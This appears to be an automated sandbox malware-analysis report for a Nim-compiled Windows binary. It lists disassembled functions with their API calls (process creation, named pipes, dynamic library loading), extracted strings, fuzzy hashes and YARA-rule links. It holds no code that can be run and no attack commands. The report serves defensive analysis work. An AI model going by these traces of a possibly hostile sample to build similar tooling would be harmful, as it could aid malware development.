Instruction Fuzzy Hash: 0B31E5327083194BC7149EADD8C423AF6D3ABD8360F59863DE94ACB3C0EB719C55B681

Function 00F05168 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feed848f599a5cd88bd727f8b4df612002df484fccf92bd63339d157ffa91842
Instruction ID: 4fca186ae0dbd2b0437e6e381fbcd2d2444aedef77f93a384c43580c619ec531
Opcode Fuzzy Hash: feed848f599a5cd88bd727f8b4df612002df484fccf92bd63339d157ffa91842
Instruction Fuzzy Hash: 30F01CB4A082099BDB00EF68D8C175BB7F5EB88344F008438E854D7385D638E9449B92

Function 00EE49D9 Relevance: 33.3, APIs: 1, Strings: 18, Instructions: 88libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00EE49E6

Part of subcall function 00EE30B2: GetLastError.KERNEL32 ref: 00EE3108
Part of subcall function 00EE30B2: MessageBoxA.USER32 ref: 00EE31BA
Part of subcall function 00EE30B2: exit.MSVCRT ref: 00EE31E1
Part of subcall function 00EE30B2: GetProcAddress.KERNEL32 ref: 00EE3205

Strings

GetExitCodeProcess, xrefs: 00EE4B45
GetCurrentProcess, xrefs: 00EE4A9D
CloseHandle, xrefs: 00EE4AC7
GetStdHandle, xrefs: 00EE4ADC
LocalFree, xrefs: 00EE4A34
WriteFile, xrefs: 00EE4B1B
SetHandleInformation, xrefs: 00EE4A5E
CreatePipe, xrefs: 00EE4A0F
CreateProcessW, xrefs: 00EE4AF1
CreateNamedPipeW, xrefs: 00EE4A73
CreateFileW, xrefs: 00EE4A88
DuplicateHandle, xrefs: 00EE4AB2
FormatMessageW, xrefs: 00EE4A1F
GetModuleFileNameW, xrefs: 00EE4B6F
WaitForSingleObject, xrefs: 00EE4B30
GetLastError, xrefs: 00EE4A49
Sleep, xrefs: 00EE4B5A
ReadFile, xrefs: 00EE4B06

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: AddressErrorLastLibraryLoadMessageProcexit
String ID: CloseHandle$CreateFileW$CreateNamedPipeW$CreatePipe$CreateProcessW$DuplicateHandle$FormatMessageW$GetCurrentProcess$GetExitCodeProcess$GetLastError$GetModuleFileNameW$GetStdHandle$LocalFree$ReadFile$SetHandleInformation$Sleep$WaitForSingleObject$WriteFile
API String ID: 2087689892-1854796719
Opcode ID: 6efbd48bac6f34102f0802d2e41295cd2d5e627e1fb9a5735368e394d5d85347
Instruction ID: 51ee11e35b55bd868d1714a0c9e3f399927784e0b76efdabfdc2512b781bbe8a
Opcode Fuzzy Hash: 6efbd48bac6f34102f0802d2e41295cd2d5e627e1fb9a5735368e394d5d85347
Instruction Fuzzy Hash: 3541FE74A0964D8BC748EFF2EF9945537F1A788380353D42E99055B396EE329A0AFB04

Function 00EE3051 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 179libraryloaderwindowCOMMON

Download Yara Rule

APIs

exit.MSVCRT ref: 00EE30AD
GetLastError.KERNEL32 ref: 00EE3108
MessageBoxA.USER32 ref: 00EE31BA
exit.MSVCRT ref: 00EE31E1
GetProcAddress.KERNEL32 ref: 00EE3205
GetProcAddress.KERNEL32 ref: 00EE32B6
exit.MSVCRT ref: 00EE3314

Strings

could not import: , xrefs: 00EE32DC
unknown signal, xrefs: 00EE3085
SIGILL: Illegal operation., xrefs: 00EE308A
SIGINT: Interrupted by Ctrl-C., xrefs: 00EE3052
could not load: , xrefs: 00EE30D3, 00EE3139
SIGFPE: Arithmetic error., xrefs: 00EE3078
SIGSEGV: Illegal storage access. (Attempt to read from nil?), xrefs: 00EE3064
(bad format; library may be wrong architecture), xrefs: 00EE3124, 00EE318B, 00EE31EA
SIGABRT: Abnormal termination., xrefs: 00EE306E
J, xrefs: 00EE30BE, 00EE31EB
@, xrefs: 00EE324F

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: exit$AddressProc$ErrorLastMessage
String ID: (bad format; library may be wrong architecture)$J$@$SIGABRT: Abnormal termination.$SIGFPE: Arithmetic error.$SIGILL: Illegal operation.$SIGINT: Interrupted by Ctrl-C.$SIGSEGV: Illegal storage access. (Attempt to read from nil?)$could not import: $could not load: $unknown signal
API String ID: 24751467-4290323954
Opcode ID: 903e3e2bf33c9eec240ff906b6051b99b853799be389900f6571cce16f78f7df
Instruction ID: f86c6885ee5d031df6c14b290afac2bd5e0ecb57677c756527edb195ecf83997
Opcode Fuzzy Hash: 903e3e2bf33c9eec240ff906b6051b99b853799be389900f6571cce16f78f7df
Instruction Fuzzy Hash: E061EA7090425C8BDB14AFB9C8857DDBBF6EF84304F0045BDD988A7382D7758E859B91

Function 00EE30B2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 151libraryloaderwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1B7F: strlen.MSVCRT ref: 00EE1B8E
Part of subcall function 00EE1B7F: fwrite.MSVCRT ref: 00EE1BA6
Part of subcall function 00EE1B7F: fflush.MSVCRT ref: 00EE1BAE

GetLastError.KERNEL32 ref: 00EE3108
MessageBoxA.USER32 ref: 00EE31BA
exit.MSVCRT ref: 00EE31E1
GetProcAddress.KERNEL32 ref: 00EE3205

Strings

could not import: , xrefs: 00EE32DC
could not load: , xrefs: 00EE30D3, 00EE3139
(bad format; library may be wrong architecture), xrefs: 00EE3124, 00EE318B, 00EE31EA
J, xrefs: 00EE30BE, 00EE31EB
@, xrefs: 00EE324F

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: AddressErrorLastMessageProcexitfflushfwritestrlen
String ID: (bad format; library may be wrong architecture)$J$@$could not import: $could not load:
API String ID: 2650761064-1246505812
Opcode ID: 740163e9207aa31f92e73d4bffb5721efa658c62dc942c749e337daf815848a3
Instruction ID: 0a79075d5ea1f8117d37eb8979e60cf21dc28925239a322f50903a784a6754f0
Opcode Fuzzy Hash: 740163e9207aa31f92e73d4bffb5721efa658c62dc942c749e337daf815848a3
Instruction Fuzzy Hash: 9D51B5B090425C8BEB10AFA5C8857DEBBF6EF44304F0041BDDA88A7342D7788E859F91

Function 00F0278D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 83COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00F02897

Strings

eani, xrefs: 00F027C1
Erro, xrefs: 00F027B3
thre, xrefs: 00F027EB
eys , xrefs: 00F027DD
r cl, xrefs: 00F027BA
ng u, xrefs: 00F027C8
for , xrefs: 00F027E4
in_k, xrefs: 00F027D6
p sp, xrefs: 00F027CF
ad , xrefs: 00F027F2

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: abort
String ID: Erro$ad $eani$eys $for $in_k$ng u$p sp$r cl$thre
API String ID: 4206212132-3726152543
Opcode ID: 16f404fd46d2a77af62eb37662f3538f979dd01cce762ae5272627f43fd6358f
Instruction ID: 274d234008f231cf458aaf2b569ab405f35b1cb69a6e1c8ec0f2c1d5449b6636
Opcode Fuzzy Hash: 16f404fd46d2a77af62eb37662f3538f979dd01cce762ae5272627f43fd6358f
Instruction Fuzzy Hash: 70315374900248DFDB10CFA8C885B8CBBF1FF85320F14822AE8589B3A6D7749A04EF51

Function 00EE7DA4 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 222COMMON

Download Yara Rule

APIs

SafeArrayGetDim.OLEAUT32 ref: 00EE7E99
SafeArrayGetVartype.OLEAUT32 ref: 00EE7EE1
SafeArrayGetLBound.OLEAUT32 ref: 00EE7F23
SafeArrayGetUBound.OLEAUT32 ref: 00EE7F55
SafeArrayAccessData.OLEAUT32 ref: 00EE7F83
SafeArrayUnaccessData.OLEAUT32 ref: 00EE7FDE

Part of subcall function 00EE6669: CoInitialize.OLE32 ref: 00EE6699
Part of subcall function 00EE6669: VariantCopy.OLEAUT32 ref: 00EE66E7

Strings

fromVariant, xrefs: 00EE808D
com.nim, xrefs: 00EE8085
VariantConversionError, xrefs: 00EE8016, 00EE8076

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCopyInitializeUnaccessVariantVartype
String ID: VariantConversionError$com.nim$fromVariant
API String ID: 2568714141-2391934419
Opcode ID: ec0cba7e2eb1cfd798148330d1a17604a27f8826b2815b26513c5d7eb1fa83ce
Instruction ID: 04bcb057df8b354711ad5157cdaacb70228e1a416cc5d078f6ba58cf6d614e76
Opcode Fuzzy Hash: ec0cba7e2eb1cfd798148330d1a17604a27f8826b2815b26513c5d7eb1fa83ce
Instruction Fuzzy Hash: 0FA166B4D0428CDFEB15DFA9C58479DBBF0AF49304F049099E888AB352DB759C89CB52

Function 00EE7022 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 188memoryCOMMON

Download Yara Rule

APIs

SafeArrayGetDim.OLEAUT32 ref: 00EE710F
SysAllocString.OLEAUT32 ref: 00EE71B0

Part of subcall function 00EE6669: CoInitialize.OLE32 ref: 00EE6699
Part of subcall function 00EE6669: VariantCopy.OLEAUT32 ref: 00EE66E7

Part of subcall function 00EE61AB: SysStringLen.OLEAUT32 ref: 00EE61C8

VariantClear.OLEAUT32 ref: 00EE7297

Strings

fromVariant, xrefs: 00EE724F
com.nim, xrefs: 00EE7247
VariantConversionError, xrefs: 00EE71E2, 00EE7238

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: StringVariant$AllocArrayClearCopyInitializeSafe
String ID: VariantConversionError$com.nim$fromVariant
API String ID: 3897195957-2391934419
Opcode ID: c0b9a92ad15459fab2646054d1497587646047e27b34f6395e10982ea21f464b
Instruction ID: fed5440cac4f90a7e82650cade2531165f07951211b887da7bf84d2e64f7eb66
Opcode Fuzzy Hash: c0b9a92ad15459fab2646054d1497587646047e27b34f6395e10982ea21f464b
Instruction Fuzzy Hash: 6371BDB0C0869C9FEF219FA5D4847ADBFF0AF49304F049449EA807B356E7744885DBA2

Function 00EE771D Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

SafeArrayGetDim.OLEAUT32 ref: 00EE77F4
VariantClear.OLEAUT32 ref: 00EE798C

Part of subcall function 00EE6669: CoInitialize.OLE32 ref: 00EE6699
Part of subcall function 00EE6669: VariantCopy.OLEAUT32 ref: 00EE66E7

VariantChangeType.OLEAUT32 ref: 00EE784E
CoInitialize.OLE32 ref: 00EE7942

Strings

fromVariant, xrefs: 00EE78EA
com.nim, xrefs: 00EE78E2
VariantConversionError, xrefs: 00EE7879, 00EE78D3

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: Variant$Initialize$ArrayChangeClearCopySafeType
String ID: VariantConversionError$com.nim$fromVariant
API String ID: 2375843262-2391934419
Opcode ID: a50f7cece5b410f8534dbb8b8fcc1a4d40e91356676fd3d6bad450013efdb19c
Instruction ID: 99f602e0202a07d9d303ba838c2dd48797f82e0bc4a3587e9252b0238762e0f6
Opcode Fuzzy Hash: a50f7cece5b410f8534dbb8b8fcc1a4d40e91356676fd3d6bad450013efdb19c
Instruction Fuzzy Hash: 4A71AF7090829C9FEF21AFA5C4443ADBBF1AF89304F05A499E4C47B383D7758844DB92

Function 00EFA6B8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 172fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00EFA6EC
vfprintf.MSVCRT ref: 00EFA70E
abort.MSVCRT ref: 00EFA713

Strings

Mingw-w64 runtime failure:, xrefs: 00EFA6E5
Address %p has no image-section, xrefs: 00EFA7AD
VirtualProtect failed with code 0x%x, xrefs: 00EFA94C
VirtualQuery failed for %d bytes at address %p, xrefs: 00EFA876

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: abortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 3176311984-1534286854
Opcode ID: 34f3288ae7fbdd133a32cdfda0656dab2c0cf0d5a6c4a4ecf6e6b3338dac60f9
Instruction ID: 5b928b86955eccfcc2737007a16b82a50ff00d529477e4ba20c36634067612b9
Opcode Fuzzy Hash: 34f3288ae7fbdd133a32cdfda0656dab2c0cf0d5a6c4a4ecf6e6b3338dac60f9
Instruction Fuzzy Hash: 3761A1B4A046099FC704DF58C981AAEB7F1FB88340F15C529E958E7351D774EA42EF82

Function 00EE31E6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00EE3205
GetProcAddress.KERNEL32 ref: 00EE32B6
exit.MSVCRT ref: 00EE3314

Strings

could not import: , xrefs: 00EE32DC
(bad format; library may be wrong architecture), xrefs: 00EE3124, 00EE318B, 00EE31EA
J, xrefs: 00EE30BE, 00EE31EB
@, xrefs: 00EE324F

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: AddressProc$exit
String ID: (bad format; library may be wrong architecture)$J$@$could not import:
API String ID: 3486290055-1653290064
Opcode ID: 5d98dde79866ae850ab431e09915aa071ba92e8fd2ed4160c1667222e4fc7a25
Instruction ID: 7a9b85ac878d916b13edcf7bd800d2e6d85e150563b38fd798d41d8a4c655fba
Opcode Fuzzy Hash: 5d98dde79866ae850ab431e09915aa071ba92e8fd2ed4160c1667222e4fc7a25
Instruction Fuzzy Hash: 9F31E77090425C9AEB14AF6ADC857EEF7F6AB59300F0040BDDACCA3342D6358E459BA1

Function 00EF2579 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 129COMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00EF25A2
SafeArrayCreate.OLEAUT32 ref: 00EF2613
SafeArrayPutElement.OLEAUT32 ref: 00EF2702

Strings

VariantConversionError, xrefs: 00EF2652, 00EF26A7
toVariant, xrefs: 00EF26BC
com.nim, xrefs: 00EF26B4

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: ArraySafe$CreateElementInitialize
String ID: VariantConversionError$com.nim$toVariant
API String ID: 2234878901-3035603046
Opcode ID: d56ca305d1e5ad057c63b6e8b602c7497dc6c38c168a44bbf540f460b1dd8d80
Instruction ID: 388ce13efdc2fcaf6e08bb3c9821cefe8de308e907e8f3b68f45de580a57d5d6
Opcode Fuzzy Hash: d56ca305d1e5ad057c63b6e8b602c7497dc6c38c168a44bbf540f460b1dd8d80
Instruction Fuzzy Hash: 5C519CB0D043589FDB21AF69C88436DBBE0FF85304F01D46EE688AB392D7758845DB92

Function 00EF274E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 122COMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00EF2777
SafeArrayCreate.OLEAUT32 ref: 00EF27E8
SafeArrayPutElement.OLEAUT32 ref: 00EF28E4

Strings

VariantConversionError, xrefs: 00EF2827, 00EF287C
toVariant, xrefs: 00EF2891
com.nim, xrefs: 00EF2889

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: ArraySafe$CreateElementInitialize
String ID: VariantConversionError$com.nim$toVariant
API String ID: 2234878901-3035603046
Opcode ID: 1f702794f37a1c86d36bb597a101a34cec95a56f2fc54ee86c5894ec2e547133
Instruction ID: 30da63480cd2f1f0366adf01aa1debfae808d81e3462cf495f8f458dba0814c6
Opcode Fuzzy Hash: 1f702794f37a1c86d36bb597a101a34cec95a56f2fc54ee86c5894ec2e547133
Instruction Fuzzy Hash: 47419EB0D0425C9FEB21EF75C84436DBBE0BF89344F11946DEA94AB342D7B58844DB92

Function 00F05504 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 36COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00F05561
exit.MSVCRT ref: 00F0556D

Strings

(, xrefs: 00F0553E
(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00F0554E
Assertion failed: (%s), file %s, line %d, xrefs: 00F05556
src/rwlock.c, xrefs: 00F05546

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: exitfprintf
String ID: ($(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$Assertion failed: (%s), file %s, line %d$src/rwlock.c
API String ID: 4243785698-3585572628
Opcode ID: 5f9f2f20a5c5fb7276d01b1f7b544be979b4043cf40b183f80b9c4b643f27279
Instruction ID: d6c9a8b3c5036b29aadc406545bfb28ca4ef8939917bf190fbf60bc73a7c2784
Opcode Fuzzy Hash: 5f9f2f20a5c5fb7276d01b1f7b544be979b4043cf40b183f80b9c4b643f27279
Instruction Fuzzy Hash: 610104746057088FC300EF58D989919BBE4BF45304F048948E4C88B3A2CBB8E884FF82

Function 00EFADA8 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 00EFAE3D
signal.MSVCRT ref: 00EFAE5A
signal.MSVCRT ref: 00EFAE9C
signal.MSVCRT ref: 00EFAEB9
signal.MSVCRT ref: 00EFAEFF
signal.MSVCRT ref: 00EFAF1C

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: bf5cc1b277670a267714325ba9559dec80da75ac437d972a0287857624e5941f
Instruction ID: 20f866bfabfc28cd85cd0e7cd7690b561414a7de3aa9b3edc70f2fb5e7b4ea1e
